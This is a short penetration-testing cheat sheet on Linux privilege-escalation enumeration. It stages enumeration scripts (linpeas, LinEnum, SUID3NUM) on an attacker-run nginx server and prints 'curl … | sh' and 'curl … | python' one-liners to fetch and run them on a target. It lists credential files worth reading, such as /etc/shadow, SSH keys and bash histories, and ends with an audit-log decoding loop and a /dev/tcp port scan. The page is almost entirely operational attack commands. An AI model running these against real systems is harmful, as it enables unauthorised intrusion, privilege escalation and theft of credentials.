🐧 Enum

You don’t have time ?

# Serve files with nginx
sudo mkdir /var/www/html/enum/ && sudo service nginx start

# Download scripts
sudo curl https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh -o /var/www/html/enum/linpeas.sh
sudo curl https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh -o /var/www/html/enum/LinEnum.sh
sudo curl https://raw.githubusercontent.com/Anon-Exploiter/SUID3NUM/master/suid3num.py -o /var/www/html/enum/suid3num.py

# Print URLs
I="tun0";IP=$(ip -f inet addr show $I|sed -En -e 's/.*inet ([0-9.]+).*/\1/p')
for i in /var/www/html/enum/*.sh;do echo -e "\ncurl \"http://$IP/enum/$(basename $i)\"|sh";done && \
for i in /var/www/html/enum/*.py;do echo -e "\ncurl \"http://$IP/enum/$(basename $i)\"|python";done

#

All in 1 Scripts

LinePEAS

curl https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/linPEAS/linpeas.sh | sh

LinEnum

curl https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh | sh

SUID Enum

Enum SUID program with python2/3 built-in modules
curl https://raw.githubusercontent.com/Anon-Exploiter/SUID3NUM/master/suid3num.py | python

Watch Process

Watch for existing and new process

Interesting Files

Public

#
/etc/issue
/etc/passwd
/etc/group

Root

#
/etc/sudoers
/etc/shadow
/etc/master.passwd # OpenBSD

/var/spool/cron/crontabs/*
/var/spool/cron/*

User

#
/home/*/.bash_history
/home/*/.ssh/*

Auditd (adm)

When parsing audit logs you may encounter hex encoded data

for VAR in cmd data ; do
  for DATA in $(grep "$VAR=[^\"]" /var/log/audit/audit.log*) ; do
    echo "$DATA" | sed "s#.*$VAR=\([^ ]*\).*#\1#" | xxd -r -p | tr -dc '[:print:]\t\n' | echo $(cat)
  done
done

Scan Ports

Retrieve hidden ports without scanner/netstat
bash -c 'for i in {1..65535};do echo>/dev/tcp/127.0.0.1/$i&&echo OK $i;done' 2>/dev/null